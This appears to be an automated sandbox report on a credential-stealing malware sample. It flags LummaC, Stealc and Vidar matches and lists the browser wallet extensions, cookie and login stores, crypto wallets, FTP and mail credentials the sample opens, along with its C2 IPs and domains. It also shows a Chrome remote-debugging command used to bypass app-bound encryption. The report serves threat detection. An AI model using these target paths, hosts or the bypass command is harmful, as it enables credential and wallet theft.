Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1009006001\eDPQZkT.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2001894530.00000000004BC000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2753465819.0000000000D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2700, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: eDPQZkT.exe PID: 8712, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: eDPQZkT.exe PID: 8712, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000000.00000003.1499547754.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2001894530.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2005702282.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 2700, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2700, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC30C40 sqlite3_bind_zeroblob, 0_2_6CC30C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC30D60 sqlite3_bind_parameter_name, 0_2_6CC30D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB58EA0 sqlite3_clear_bindings, 0_2_6CB58EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CC30B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6CC30B40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB56410 bind,WSAGetLastError, 0_2_6CB56410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562256 Sample: file.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 100 70 property-imper.sbs 2->70 72 frogs-severz.sbs 2->72 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 Antivirus detection for URL or domain 2->114 116 11 other signatures 2->116 9 file.exe 37 2->9         started        14 skotes.exe 2->14         started        16 skotes.exe 2->16         started        18 msedge.exe 629 2->18         started        signatures3 process4 dnsIp5 74 185.215.113.16, 49830, 80 WHOLESALECONNECTIONSNL Portugal 9->74 76 185.215.113.206, 49704, 49728, 49744 WHOLESALECONNECTIONSNL Portugal 9->76 78 127.0.0.1 unknown unknown 9->78 54 C:\Users\user\DocumentsCAEHDBAAEC.exe, PE32 9->54 dropped 56 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->56 dropped 58 C:\Users\user\AppData\Local\...\random[1].exe, PE32 9->58 dropped 68 11 other files (3 malicious) 9->68 dropped 136 Detected unpacking (changes PE section rights) 9->136 138 Attempt to bypass Chrome Application-Bound Encryption 9->138 140 Drops PE files to the document folder of the user 9->140 148 9 other signatures 9->148 20 cmd.exe 9->20         started        22 msedge.exe 2 11 9->22         started        25 chrome.exe 8 9->25         started        80 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 14->80 82 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 14->82 60 C:\Users\user\AppData\...\ead1a5c329.exe, PE32 14->60 dropped 62 C:\Users\user\AppData\Local\...\eDPQZkT.exe, PE32 14->62 dropped 64 C:\Users\user\AppData\...\eDPQZkT[1].exe, PE32 14->64 dropped 66 C:\Users\user\AppData\Local\...\random[1].exe, PE32 14->66 dropped 142 Hides threads from debuggers 14->142 144 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->144 146 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->146 28 eDPQZkT.exe 14->28         started        30 msedge.exe 18->30         started        32 msedge.exe 18->32         started        34 msedge.exe 18->34         started        36 msedge.exe 18->36         started        file6 signatures7 process8 dnsIp9 38 DocumentsCAEHDBAAEC.exe 20->38         started        42 conhost.exe 20->42         started        118 Monitors registry run keys for changes 22->118 44 msedge.exe 22->44         started        84 192.168.2.8, 443, 49703, 49704 unknown unknown 25->84 86 239.255.255.250 unknown Reserved 25->86 46 chrome.exe 25->46         started        88 frogs-severz.sbs 104.21.88.250 CLOUDFLARENETUS United States 28->88 120 Multi AV Scanner detection for dropped file 28->120 122 Detected unpacking (changes PE section rights) 28->122 124 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->124 126 6 other signatures 28->126 90 18.173.219.111, 443, 49795, 49814 MIT-GATEWAYSUS United States 30->90 92 104.40.82.182, 443, 49797 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 30->92 94 31 other IPs or domains 30->94 signatures10 process11 dnsIp12 52 C:\Users\user\AppData\Local\...\skotes.exe, PE32 38->52 dropped 128 Detected unpacking (changes PE section rights) 38->128 130 Tries to evade debugger and weak emulator (self modifying code) 38->130 132 Tries to detect virtualization through RDTSC time measurements 38->132 134 4 other signatures 38->134 49 skotes.exe 38->49         started        96 plus.l.google.com 172.217.17.78, 443, 49731 GOOGLEUS United States 46->96 98 www.google.com 172.217.21.36, 443, 49708, 49709 GOOGLEUS United States 46->98 100 apis.google.com 46->100 file13 signatures14 process15 signatures16 102 Detected unpacking (changes PE section rights) 49->102 104 Tries to evade debugger and weak emulator (self modifying code) 49->104 106 Hides threads from debuggers 49->106 108 2 other signatures 49->108
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
13.107.246.63
 s-part-0035.t-0009.t-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
13.107.246.40
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
152.195.19.97
 unknown United States
15133 EDGECASTUS false
172.217.19.225
 googlehosted.l.googleusercontent.com United States
15169 GOOGLEUS false
162.159.61.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
23.209.72.33
 unknown United States
20940 AKAMAI-ASN1EU false
23.44.201.23
 unknown United States
20940 AKAMAI-ASN1EU false
204.79.197.239
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.217.21.36
 www.google.com United States
15169 GOOGLEUS false
20.110.205.119
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
204.79.197.219
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.40.82.182
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.64.41.3
 unknown United States
13335 CLOUDFLARENETUS false
52.123.243.184
 mira-tmc.tm-4.office.com United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
13.107.9.158
 b-0005.b-dc-msedge.net United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
204.79.197.237
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false
23.44.201.21
 unknown United States
20940 AKAMAI-ASN1EU false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false
172.217.17.78
 plus.l.google.com United States
15169 GOOGLEUS false
94.245.104.56
 ssl.bingadsedgeextension-prod-europe.azurewebsites.net United Kingdom
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
18.173.219.111
 unknown United States
3 MIT-GATEWAYSUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
20.189.173.24
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.21.88.250
 frogs-severz.sbs United States
13335 CLOUDFLARENETUS false
239.255.255.250
 unknown Reserved
unknown unknown false
23.44.201.7
 unknown United States
20940 AKAMAI-ASN1EU false
23.44.201.5
 unknown United States
20940 AKAMAI-ASN1EU false
104.117.182.56
 unknown United States
20940 AKAMAI-ASN1EU false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
20.75.60.91
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
204.79.197.203
 unknown United States
8068 MICROSOFT-CORP-MSN-AS-BLOCKUS false

Private

IP
192.168.2.8
127.0.0.1

Contacted Domains

Name IP Active
mira-tmc.tm-4.office.com 52.123.243.184 true
chrome.cloudflare-dns.com 162.159.61.3 true
plus.l.google.com 172.217.17.78 true
frogs-severz.sbs 104.21.88.250 true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56 true
sb.scorecardresearch.com 18.165.220.110 true
www.google.com 172.217.21.36 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
b-0005.b-dc-msedge.net 13.107.9.158 true
googlehosted.l.googleusercontent.com 172.217.19.225 true
clients2.googleusercontent.com unknown unknown
bzib.nelreports.net unknown unknown
assets.msn.com unknown unknown
property-imper.sbs unknown unknown
deff.nelreports.net unknown unknown
ntp.msn.com unknown unknown
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll false
    		high
    http://185.215.113.206/ false
      		high
      https://sb.scorecardresearch.com/b2?rn=1732532933075&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0A576580DC7A6D0124D170C2DDEE6CAA&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null false
        		high
